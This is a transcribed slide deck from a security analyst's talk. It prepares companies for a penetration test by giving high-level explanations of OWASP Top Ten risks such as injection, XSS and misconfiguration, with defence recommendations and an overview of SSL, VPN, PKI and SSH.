so your company hired a pentester

20
So Your Company Hired a Pentest Team Carl Sue, Security Analyst FishNet Security, Application Security

Upload: northbayweb

Post on 05-Dec-2014

323 views

Category:

Technology


3 download

DESCRIPTION

 

TRANSCRIPT

Page 1: So Your Company Hired A Pentester

So Your Company Hired a Pentest Team

Carl Sue, Security AnalystFishNet Security, Application Security

Page 2: So Your Company Hired A Pentester

Disclaimer

The contents of this talk are my own personal research and training. FishNet Security has no affiliation with this talk and can not be held responsible for any of its contents. As such it should not be seen as marketing or any other from of public interaction by FishNet Security.

Page 3: So Your Company Hired A Pentester

Don’t Panic!

No Really!

Don’t Panic!

Page 4: So Your Company Hired A Pentester

Truly Secure Site

Page 5: So Your Company Hired A Pentester

Web 2.0 is about Risk Assessmentthese sites are still considered secure

Facebook WordPress

Page 6: So Your Company Hired A Pentester

Why Risk Assessment?

• The Internet is BIG• No, no no The Internet is REALLY REALLY BIG• To go along with this really big internet we have

a really big Codebase• To add to this really big codebase, just like we

learned in our first programming class there are a thousand ways to do just about anything .

• Risk Assessment is more about hardening your web app or site to common attacks than uncommon attacks that target your unique situation.

• Now you must be thinking what's a low hanging fruit?

Page 7: So Your Company Hired A Pentester

Low Hanging Fruit

• OWASP top Ten• OWASP is the open Web Application Security

Project.• Every few years they put out a report of the top

ten vulnerabilities found on the internet.• They Also have some great tools for testing your

Web Applications. • If you want an Idea of how to prepare for a

Security Audit OWASP is a great resource.

Page 8: So Your Company Hired A Pentester

OWASP Top Ten 2010

A1: InjectionA2: Cross-Site

Scripting (XSS)

A3: Broken Authentication

and Session Management

A4: Insecure Direct Object References

A5: Cross Site Request Forgery (CSRF)

A6: Security Misconfigurati

on

A7: Failure to Restrict URL

Access

A8: Insecure Cryptographic

Storage

A9: Insufficient Transport

Layer Protection

A10: Unvalidated

Redirects and Forwards

Page 9: So Your Company Hired A Pentester

A1 - Injection

• Tricking an application into including unintended commands in the data sent to an interpreter

Injection means…

• Many applications still susceptible (really don’t know why)

• Even though it’s usually very simple to avoid

SQL injection is still quite common

• Usually severe. Entire database can usually be read or modified

• May also allow full database schema, or account access, or even OS level access

Typical Impact

Page 10: So Your Company Hired A Pentester

Injection Defense Recommendations

1. Avoid the interpreter entirely, or2. Use an interface that supports bind variables (e.g.,

prepared statements, or stored procedures), Bind variables allow the interpreter to distinguish between

code and data

3. Encode all user input before passing it to the interpreter Always perform ‘white list’ input validation on all user

supplied input Always minimize database privileges to reduce the

impact of a flaw

Page 11: So Your Company Hired A Pentester

A2 – Cross Site Scripting (XSS)

• Raw data from attacker is sent to an innocent user’s browser

Occurs any time…

• Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site

• Most Severe: Install XSS proxy which allows attacker to observe and direct all user’s behavior on vulnerable site and force user to other sites

Typical Impact

Page 12: So Your Company Hired A Pentester

Cross Site Scripting Negation

Recommendations Eliminate Flaw

Don’t include user supplied input in the output page Defend Against the Flaw

Primary Recommendation: Output encode all user supplied input

Perform ‘white list’ input validation on all user input to be included in page

For large chunks of user supplied HTML, use HTML sanitization to sanitize all HTML and make it safe

Page 13: So Your Company Hired A Pentester

A6 – Security Misconfiguration• Everywhere from the OS up through the App Server• Don’t forget all the libraries you are using!!

Web applications rely on a secure foundation

• Think of all the places your source code goes• Security should not require secret source code

Is your source code a secret?

• All credentials should change in production

CM must extend to all parts of the application

• Install backdoor through missing OS or server patch• XSS flaw exploits due to missing application framework patches• Unauthorized access to default accounts, application functionality or data, or

unused but accessible functionality due to poor server configuration

Typical Impact

Page 14: So Your Company Hired A Pentester

Proper Security Configuration Management

Verify your system’s configuration management Secure configuration “hardening” guideline

Automation is REALLY USEFUL here Must cover entire platform and application Keep up with patches for ALL components

This includes software libraries, not just OS and Server applications Analyze security effects of changes

Can you “dump” the application configuration Build reporting into your process If you can’t verify it, it isn’t secure

Verify the implementation Scanning finds generic configuration and missing patch

problems

Page 15: So Your Company Hired A Pentester

Are Your Coms Secure?

SSL

VPN

PKI

SSH/SFTP

Page 16: So Your Company Hired A Pentester

PKI - If I Can’t read it nobody can

Page 17: So Your Company Hired A Pentester

SSL - Keeping it Clean

• Third Party Authentication• PKI encryption• Keeps the conversation between the client and the host

Does

• Protect the client from malware snooping or interference• Remove malicious code.

Does Not

• Encryption is process heavy• The internet is old

Why Its not standard

• Always…• When dynamic code is used• At least when logins are in use anywhere on the site.

When you should use it.

Page 18: So Your Company Hired A Pentester

VPN - Keeping it Local

• PKI encryption• Keeps the conversation between the client and the host

Does

• Protect the client from malware snooping or interference• Remove malicious code.

Does Not

• Encryption is process heavy• The internet is old

Why Its not standard

• Always…• When dynamic code is used• At least when logins are in use anywhere on the site.

When you should use it.

Page 19: So Your Company Hired A Pentester

SSH/SFTP – Connect Properly

• PKI encryption• Connects to your server for quick secure file management• Allows you to issue commands to your server

Does

• Help the Client• Provide any code sanitization

Does Not

• FTP• God forbid Telnet

What It Replaces

• Anytime you connect to your server• All File transfer for source code• Editing any source on host

When You Should Use It.

Page 20: So Your Company Hired A Pentester

Contact InfoEmail: [email protected]: @iamcoboltWeb: http://www.fishnetsecurity.com/BlogsPersonal: http://www.carlsue.com

Thanks For Having Me!

More Info• https://www.owasp.org• Web Application Hackers Handbook• The Tangled Web – No Starch Press• SQL Injection Attacks and Defense

Questions?